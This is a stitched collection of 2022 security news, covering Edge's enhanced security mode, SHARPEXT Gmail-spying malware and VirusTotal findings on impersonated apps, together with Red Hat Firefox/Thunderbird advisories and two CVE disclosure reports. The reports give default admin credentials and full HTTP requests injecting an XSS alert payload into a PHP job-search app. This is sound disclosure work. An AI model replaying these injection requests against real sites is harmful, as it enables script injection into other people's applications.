Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Microsoft has introduced an optional feature to its Edge browser that applies more stringent security controls when users visit unfamiliar websites.

Enhanced security mode mitigates memory-related vulnerabilities by disabling just-in-time (JIT) JavaScript compilation, while activating additional operating system protections for the browser such as arbitrary code guard and hardware-enforced stack protection, according to Microsoft.

It said these changes provide “defense in depth” by making it harder for malicious sites to leverage unpatched vulnerabilities in order to write to executable code into memory.

RELATED Chromium site isolation bypass allows wide range of attacks on browsers

Microsoft said the provision of a “rich browsing experience using powerful technologies like JavaScript” heightens the risks of visiting malicious sites. “With enhanced security mode, Microsoft Edge helps reduce the risk of an attack by automatically applying more conservative security settings on unfamiliar sites and adapts over time as you continue to browse,” said Redmond.

**First of its kind**

Rival browsers Chrome and Firefox currently lack equivalent features, although can be configured to disable features such as JIT.

As for Safari, Apple recently announced a new security feature aimed at defending users at potential risk of highly targeted cyber-attacks that also disables JIT and other complex web technologies, unless the user excludes a trusted site. Called Lockdown Mode, this feature is designed to protect journalists, politicians, and human rights activists from spyware.

Catch up with the latest browser security news

The Microsoft Edge security team published analysis of the results of its experimentations with the new feature in August 2021 and February 2022.

The feature was rolled out in Microsoft Edge version 104, which was released August 5.

**Three levels of security**

The new feature, which is turned off by default, can be enabled as one of three modes.

In its ‘basic’ – and recommended – configuration, the feature applies “added security protection to the less visited sites”, but “preserves the user experience for the most popular sites on the web”, explained Microsoft.

Basic mode does not adapt according to user behavior. By contrast, ‘balanced’ mode “builds on user’s behavior on a particular device, and Microsoft’s understanding of risk across the web to give sites that users are most likely to use and trust full access to the web platform, while limiting what new and unfamiliar sites can do”.

Finally, the ‘strict’ setting applies enhanced safeguards universally against all sites. It isn’t recommended for most end users because of the additional configuration required for users “to complete their normal tasks”.

In all three modes, users can create exceptions for trusted websites, with enterprise admins able to create ‘allow’ and ‘deny’ lists.

Sites that use WebAssembly (WASM), a binary instruction format for stack-based virtual machines, are not currently supported by the feature. Sites that need WASM can be added to the exception site list.

An ‘added security’ banner appears in the URL navigation bar when enhanced security mode is activated for a particular site.

RECOMMENDED XSS in Gmail’s AMP For Email earns researcher $5,000

Microsoft Edge deepens defenses against malicious websites with enhanced security mode

By Waqas
Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying…
This is a post from HackRead.com Read the original post: Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

****Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying malware dubbed SHARPEXT.****

**Gmail** users should watch out for the newly discovered email reading malware named SHARPEXT. It is identified by cybersecurity firm Volexity. This nosey malware spies on AOL and Google account holders and can read/download their private emails and attachments.

**Campaign Details**

SHARPEXT malware infects devices through browser extensions on Google Chrome and Chromium-based platforms, including Korean browser Naver Whale and Microsoft Edge. Its primary targets are users in the USA, South Korea, and Europe, while its origin has been traced to a North Korean hacker group called Kimsuky or SharpTongue, which is associated with the North Korean intelligence agency Reconnaissance General Bureau.

The typical targets of SHARPEXT malware include those working in nuclear weaponry. It is worth noting that **in Jun 2021**, Kimsuky APT was found targeting the South Korean atomic agency by exploiting VPN flaws. **In March 2015**, the same group was blamed for targeting South Korea’s Kori nuclear plant and leaking sensitive data on Twitter.

As for SHARPEXT; the malware can directly inspect and exfiltrate data from Gmail accounts and impact version 3.0. This campaign has been active for more than a year, and during this time, it has stolen thousands of files and messages from Gmail and AOL email accounts.

The malware is currently targeting Windows devices, but Volexity claims it may work on Linux and macOS devices too.

**How the Attack Occurs?**

The victims are lured into opening a document that contains the malware. The malware is distributed through **social engineering** and spear phishing scams.

> “Prior to deploying SHARPEXT, the attacker manually exfiltrates files required to install the extension (explained below) from the infected workstation. SHARPEXT is then manually installed by an attacker-written VBS script.”
> 
> Paul Rascagneres, Thomas Lancaster – Volexity Threat Research

According to Volexity’s **blog post**, once installed on the device, SHARPEXT malware inserts itself within the browser via the Preferences and Secure Preferences files. It then enables its email read/download capabilities. Moreover, it also hides warning alerts that may be displayed to notify the user about the presence of an unverified extension on the device.

For your information, SHARPEXT malware-laced extensions are hard to spot since there’s no such thing in it that could trigger an antivirus scanner response, and the actual threat runs from another server.

Process workflow of SHARPEXT malware (Image: Volexity)

1.  **Gmail wittingly storing your online purchase data for years**
2.  **Google vulnerability allowed sending spoofed emails with Gmail ID**
3.  **Hackers using malicious Firefox extension to phish Gmail credentials**
4.  **Popular Android Zombie game phishing users to steal Gmail credentials**
5.  **Microsoft MSHTML flaw exploited in Gmail and Instagram phishing scam**

**How to Stay Protected?**

Volexity has published a list of IoCs (indicators of compromise) on **Github** to help you identify if the device has been infected already. You may also inspect all the browser extensions installed and check if all of them can be found on Chrome Web Store.

Furthermore, Remove any extensions that look suspicious, or you downloaded from an unreliable source. Always use the best antivirus solutions to keep your device protected.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

Complete Online Job Search System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the U_NAME parameter at /category/controller.php?action=edit.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 by campcodes.com has Cross-Site Scripting (XSS)**

**Vul\_Author**: **Liyu Chen**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/user/controller.php

Vulnerability location: /eris/admin/user/controller.php?action=edit, U\_NAME

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /eris/admin/user/controller.php?action\=edit HTTP/1.1
Host: 10.10.10.134
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: http://10.10.10.134
DNT: 1
Connection: close
Referer: http://10.10.10.134/eris/admin/user/index.php?view=edit&id=2018001
Cookie: PHPSESSID=vf7g6ffd2s4el0u0gia3elgg14
Upgrade-Insecure-Requests: 1
USERID=2018001&deptid=&U\_NAME=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&deptid=&U\_USERNAME=Narciso&deptid=&U\_PASS=123&U\_ROLE=Administrator&save=

CVE-2022-35163: bug_report/XSS.md at main · chen-liyu/bug_report

Complete Online Job Search System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the CATEGORY parameter at /category/controller.php?action=edit.

Permalink

Cannot retrieve contributors at this time

**Complete Online Job Search System v1.0 has Cross-Site Scripting (XSS)**

**Vul\_Author**: **Yingsha Xu**

The password for the backend login account is: admin/admin

vendors: https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

Vulnerability File: /eris/admin/category/controller.php

Vulnerability location: /eris/admin/category/controller.php?action=edit, CATEGORY

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

POST /eris/admin/category/controller.php?action\=edit HTTP/1.1
Host: 10.10.10.134
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://10.10.10.134
DNT: 1
Connection: close
Referer: http://10.10.10.134/eris/admin/category/index.php?view=edit&id=24
Cookie: PHPSESSID=vf7g6ffd2s4el0u0gia3elgg14
Upgrade-Insecure-Requests: 1
CATEGORYID=24&CATEGORY=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&save=

CVE-2022-35162: bug_report/XSS.md at main · xysasa/bug_report

Red Hat Security Advisory 2022-5766-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.12.0 ESR. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:5766-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5766  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.12.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
firefox-91.12.0-2.el8_1.src.rpm

ppc64le:  
firefox-91.12.0-2.el8_1.ppc64le.rpm  
firefox-debuginfo-91.12.0-2.el8_1.ppc64le.rpm  
firefox-debugsource-91.12.0-2.el8_1.ppc64le.rpm

x86_64:  
firefox-91.12.0-2.el8_1.x86_64.rpm  
firefox-debuginfo-91.12.0-2.el8_1.x86_64.rpm  
firefox-debugsource-91.12.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtD9zjgjWX9erEAQiVVBAAlwFmT2vc3sENgpmZ+8/q8ZVoBTf1mPDw  
uncOUQpxdt2F09swMu+yigMmxl/bhhOY6rpBh3pgWswkpfKRAuNDmDZCmeyjQv7C  
UcR+DOVggFiSrwt2SAbWLEnOE6+H6gddpyXIZqaUcIesEtopHy65ZN51pZMCv9HF  
D2s63iapGQJ3/ZsiQBEGWpxsnGbP2lNCc9GYtXXAJdj8EcBX5bBCCRxD3QUtT0EW  
2M6RDsUJOp1XndO4hQ7w4EuMbqKyUb2/rAywSpgrAOksLscBz+m/JcXraiERz0IB  
DzER4GBXPhZshALzWhHGJbOsezodYMureyHdusm/KLF233d+wQsfirOojt+eGQ40  
NFvZcxBukRViXILyF8DCrxARN5zDqEJDB6NNZ0BolSVLLGJTXYk9eb5iQRCQGI/s  
sCL8DpfGyCq09ZmvWvm9oQJYj5UG1b0D2MWHN5UT4zL2rRqEdhcSgVkEac2HAg04  
pyjxlcfHCat48g2UxjdTgRiQ8p0Ugaw1kTRq2QmCzceEfWAJTg7YUGJJYp9e56jq  
ihWOLc0JUcD3L2GRKVWmi7RhI+j/ubzS58g+mOOdFB/hZm0xckhrYx86O+Nm1BiA  
pjjt5rPE+qN87KTYRD/89Cq7xqKAZ//Gd/tdF6F+21YD/9jYFzEftiHzZ4kuWi+W  
FYZF4CvZp00<tG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5766-01

Red Hat Security Advisory 2022-5778-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.12.0. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:5778-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5778  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.12.0.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
thunderbird-91.12.0-1.el9_0.src.rpm

aarch64:  
thunderbird-91.12.0-1.el9_0.aarch64.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.aarch64.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.aarch64.rpm

ppc64le:  
thunderbird-91.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.ppc64le.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.ppc64le.rpm

s390x:  
thunderbird-91.12.0-1.el9_0.s390x.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.s390x.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.s390x.rpm

x86_64:  
thunderbird-91.12.0-1.el9_0.x86_64.rpm  
thunderbird-debuginfo-91.12.0-1.el9_0.x86_64.rpm  
thunderbird-debugsource-91.12.0-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtU9zjgjWX9erEAQicng//b/BsXxUqc7TqKspEoGUbs4q+BirSlgVa  
ulGBprxWLroeNF+ClaBllNC/6ZQtITJjfUoT4hOYw32tZYxShATN0ObmWOFnL3k+  
8aQp+5eh1cXdaO0JM6c35p6i/gxaX1r3cJM8pDpxzQO84AMMxPz8xYrqYFv5MpJ9  
dpve2SkOKvKLyn51KbkKGbXsaYjJ6/leLWGKBbfXrowplWLEeVyquxwpwHlHtfRh  
91ZKuTWqMIlo3UOckEwatxyNA35UzyhtIgJcvMPdnCHozOIBgPWs3X0657IV6lar  
k8Y05GJqLPHdSHAnu5YrF8Mb3DL9ydXoaZ0F8DHZrCqoGboLINSFle8B/BPjkyiI  
oeLxRWSYMEWN5O3YgdZvff1x/8c0Xjb2grJaLWZNqIHimUZTDlDZ4gvCCqRWKDe0  
Lm+esw6kSiiBlG4LIjWTPAu6F/XQlzT53EvmzNshRUmxPdEa7gdLTt22Qz0x1qem  
t7nauhS5eUcsPEBfaJO8vJH8qfCBlop2Fxw7b9m+VsGz7Sf5Kq/9C78YyX1ghheU  
eXs41vlrRU/femYEyKidpg2D3eCdXrfeofEeEWPKHHZHKqUrjJywt+HfLkzlCfUW  
Bfe0nuXMKCE73+v96x3yvNXlYvcWPK4M4o10wpYKi7UmFdJ29fnJKZbFoI36Qm0k  
sARyBN3xic8=tFXV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5778-01

Red Hat Security Advisory 2022-5765-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.12.0 ESR. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:5765-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5765  
Issue date:        2022-08-01  
CVE Names:         CVE-2022-2505 CVE-2022-36318 CVE-2022-36319  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.12.0 ESR.

Security Fix(es):

* Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1  
(CVE-2022-2505)

* Mozilla: Directory indexes for bundled resources reflected URL parameters  
(CVE-2022-36318)

* Mozilla: Mouse Position spoofing with CSS transforms (CVE-2022-36319)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2111907 - CVE-2022-36319 Mozilla: Mouse Position spoofing with CSS transforms  
2111908 - CVE-2022-36318 Mozilla: Directory indexes for bundled resources reflected URL parameters  
2111910 - CVE-2022-2505 Mozilla: Memory safety bugs fixed in Firefox 103 and 102.1

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
firefox-91.12.0-2.el8_2.src.rpm

aarch64:  
firefox-91.12.0-2.el8_2.aarch64.rpm  
firefox-debuginfo-91.12.0-2.el8_2.aarch64.rpm  
firefox-debugsource-91.12.0-2.el8_2.aarch64.rpm

ppc64le:  
firefox-91.12.0-2.el8_2.ppc64le.rpm  
firefox-debuginfo-91.12.0-2.el8_2.ppc64le.rpm  
firefox-debugsource-91.12.0-2.el8_2.ppc64le.rpm

s390x:  
firefox-91.12.0-2.el8_2.s390x.rpm  
firefox-debuginfo-91.12.0-2.el8_2.s390x.rpm  
firefox-debugsource-91.12.0-2.el8_2.s390x.rpm

x86_64:  
firefox-91.12.0-2.el8_2.x86_64.rpm  
firefox-debuginfo-91.12.0-2.el8_2.x86_64.rpm  
firefox-debugsource-91.12.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2505  
https://access.redhat.com/security/cve/CVE-2022-36318  
https://access.redhat.com/security/cve/CVE-2022-36319  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuqtGtzjgjWX9erEAQjZrBAAiHKiZZS88J/8+Bhx9Mxy/+cP81vNJrpM  
0Baqazt9y7GY3R4E/+mukM+94ffKbrp8jY4r/65YUQWearmkCLNccMjnnvZDHOdk  
a0U1POusGiRZiYy0cBeW0c1i6D6wYkOrn9pHNLiJmR7h6UTizrFPWuED9FIGotL9  
97w5UaR5sd4g3B8M1ApZKwHU+fqVfSdUEaZruhVhEr9+TOAmm84nKs7s7hRZdsEz  
XQjqEjIvIsRY06tOtBH28uFUJFuPg0vTGHb/OnZk+kM3FLKFT9FYn4tWfs2/f3ll  
014a+aLnOJnAYauSngjNxC6pQevjbHERambdPflHeMkLp9eIXWSDgitSRbAEa3N6  
wqBeeqUPT+Li4yqRj/Um6dUNNDqDkg9dyU9qmkzwlVdj/oOV3JcQJXxscF+0tnNs  
TfuiFzE4izDWr32zDcpNVNLH09MBJrauxpQhlrq41cMqMtqghx7RMSd0GLcT4Qc4  
oEO6AVRDtlnv0CbwKzdX7LPL7+H8E9XtTn2+5AOYs+Jrm7lWYjSlH+/yyzFXEZpV  
6XYS2939cAe+HeKgSWcZ8e2szgEsHxBRU5Z6AqtMyiGadLynX+FD7dfve2+yx72Z  
Kt48NaAwgWtEysiTjVbQPTe91mIk/52iNhxbQSP+md/wXHRFcv6TEsP5H+ADwRBR  
tuDh9q6ZbXA=VaGw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5765-01

By Deeba Ahmed
According to the latest research findings from VirusTotal, cybercriminals and threat actors are increasingly relying on mimicked versions…
This is a post from HackRead.com Read the original post: VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

According to the latest research findings from **VirusTotal**, cybercriminals and threat actors are increasingly relying on mimicked versions of genuine, common-use apps such as Adobe Reader, Skype, and VLC Player to successfully conduct social engineering attacks.

**Findings Details**

In their study of malware, researchers at Google’s VirusTotal revealed that cybercriminals deploy numerous approaches to abuse the trust users have in many reputable apps.

The most widespread tactic is **mimicking legit apps to deliver malware**. In this technique, the app’s icon is replicated to gain the victim’s trust and convince them to use the mimicked app. The purpose behind this malicious new strategy is to bypass security solutions such as IP or domain-based firewalls on devices and spread malware via trusted domains.

Another commonly used attack tactic is stealing authentic signing certificates from legit software vendors and using them for signing the malware. Reportedly, since 2021, over one million signed samples had been declared suspicious.

Around thirteen percent of the samples checked by Google’s team didn’t have a valid signature when uploaded on VirusTotal for the first time, and over ninety-nine percent of them were DLL or Windows Portable Executable files.

This happens because the process of examining the validity of a signed file can be abused by malware stated VirusTotal security engineer Vicente Diaz. This becomes concerning when attackers start stealing legit certificates and creating an **ideal supply chain attack scenario**.

The third technique is incorporating legit installers as a portable executable resource into malicious samples to execute the installer when malware is run.

1.  **Microsoft Office Most Exploited Software in Malware Attacks**
2.  **US and China Exposed Most Databases Among 380k Found in 2021**
3.  **Fake reviews & third-party apps cause 50% of threats against Android**
4.  **134 million downloads in 85 countries: A look at VPN usage in H1 2020**
5.  **Google, Microsoft and Oracle generated the most vulnerabilities in 2021**
6.  **Google Drive accounted for 50% of malicious Office document downloads**

**Over 2 Million Suspicious Files Downloaded from Top Domains**

According to VirusTotal’s **blog post**, ten percent of the **top 1,000 Alexa domains** had distributed suspicious samples, including the domains commonly used for distributing files, and over 2 million shady files were downloaded from these domains.

Despite the technique’s simplicity, Diaz explains, it can effectively avoid raising red flags for the victim. That’s why many channels are becoming popular as potent malware distribution vectors. This includes the distribution of **cracked software**.

**Most Abused Websites and Apps**

The top three mimicked apps include the following:

*   Adobe Acrobat
*   VLC media player
*   Skype VoIP platform

When they researchers examined the URLs using web icon similarity, WhatsApp, Instagram, Facebook, and iCloud were the four most abused sites.

> “Adobe Acrobat, Skype, and 7zip are very popular and have the highest infection ratio, which probably makes them the top three applications and icons to be aware of from a social engineering perspective.”
> 
> VirusTotal

Furthermore, VirusTotal discovered 1,816 samples since January 2020 masquerading legit software by hiding the malware in installers for popular software like Zoom, Google Chrome, Proton VPN, Brave, and Mozilla Firefox.

Other impersonated apps by icon were TeamViewer, 7-Zip, CCleaner, Steam, Microsoft Edge, Zoom, and WhatsApp. The abused domains included are discordappcom, squarespacecom, amazonawscom, mediafirecom, and qqcom. 

The reason why attackers are using these software and apps is unknown as yet but one reason could be their popularity, Diaz stated.

**More Malware News**

1.  **Malware families using Pay-Per-Install service to expand targets**
2.  **This malware hides behind free VPN, pirated security software keys**
3.  **Fake KPSPico Windows activator tool KPSPico steals crypto wallet data**
4.  **Malware droppers for hire targeting users on fake pirated software sites**
5.  **Researchers Warn of New Variants of ChromeLoader Browser in the Wild**

VirusTotal Reveals Apps Most Exploited by Hackers to Spread Malware

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.
Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.
"One of the

Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack.

Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed.

"One of the simplest social engineering tricks we've seen involves making a malware sample seem a legitimate program," VirusTotal said in a Tuesday report. "The icon of these programs is a critical feature used to convince victims that these programs are legitimate."

It's no surprise that threat actors resort to a variety of approaches to compromise endpoints by tricking unwitting users into downloading and running seemingly innocuous executables.

This, in turn, is primarily achieved by taking advantage of genuine domains in a bid to get around IP-based firewall defenses. Some of the top abused domains are discordapp\[.\]com, squarespace\[.\]com, amazonaws\[.\]com, mediafire\[.\]com, and qq\[.\]com.

In total, no fewer than 2.5 million suspicious files downloaded from 101 domains belonging to Alexa's top 1,000 websites have been detected.

The misuse of Discord has been well-documented, what with the platform's content delivery network (CDN) becoming a fertile ground for hosting malware alongside Telegram, while also offering a "perfect communications hub for attackers."

Another oft-used technique is the practice of signing malware with valid certificates stolen from other software makers. The malware scanning service said it found more than one million malicious samples since January 2021, out of which 87% had a legitimate signature when they were first uploaded to its database.

VirusTotal said it also uncovered 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.

Such a distribution method can also result in a supply chain when attackers manage to break into a legitimate software's update server or gain unauthorized access to the source code, making it possible to sneak the malware in the form of trojanized binaries.

Alternatively, legitimate installers are being packed in compressed files along with malware-laced files, in one case including the legitimate Proton VPN installer and malware that installs the Jigsaw ransomware.

That's not all. A third method, albeit more sophisticated, entails incorporating the legitimate installer as a portable executable resource into the malicious sample so that the installer is also executed when the malware is run so as to give an illusion that the software is working as intended.

"When thinking about these techniques as a whole, one could conclude that there are both opportunistic factors for the attackers to abuse (like stolen certificates) in the short and mid term, and routinely (most likely) automated procedures where attackers aim to visually replicate applications in different ways," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

VirusTotal Reveals Most Impersonated Software in Malware Attacks

In Quest KACE Systems Management Appliance (SMA) through 12.0, a hash collision is possible during authentication. This may allow authentication with invalid credentials.

For the best web experience, please use IE11+, Chrome, Firefox, or Safari

*   Resources
*   Blogs
    
    *   IT Industry Insights
    *   Quest Solution Blogs
        *   Data Protection
        *   Data Management
        *   Microsoft Platform Management
        *   Performance Monitoring
        *   Unified Endpoint Management
        *   IT Ninja
        *   Toad World Blog
    
*   Forums
*   
*   *   United States (English)
    *   Brazil (Português)
    *   China (中文)
    *   France (Français)
    *   Germany (Deutsch)
    *   Japan (日本語)
    *   Mexico (Español)
    
*   
*   *   Account Settings
    

Products

**Products****By Product Category**

Solutions

**Solutions**

*   **Automate backup & disaster recovery**
    
    Restore business operations, data integrity and customer trust in minutes or hours instead of weeks or months
    
*   **Become data driven**
    
    Empower enterprise stakeholders to use data assets strategically for data operations, data protection and data governance
    
*   **Gain comprehensive data protection**
    
    Protect and recover all your systems, applications and data while reducing backup storage costs
    
*   **Improve your cybersecurity posture**
    
    Achieve identity-centric cybersecurity to protect the people, applications and data that are essential to business
    
*   **Migrate & consolidate Microsoft workloads**
    
    Conquer your next migration (now and in the future) by making it a non-event for end users
    
*   **Protect and secure your endpoints**
    
    Discover, manage and secure evolving hybrid workforce environments
    
*   **Strengthen hybrid AD & Microsoft 365 security**
    
    Detect, defend against and recover from cyber attacks and insider threats
    

About

*   Why Quest
*   Leadership
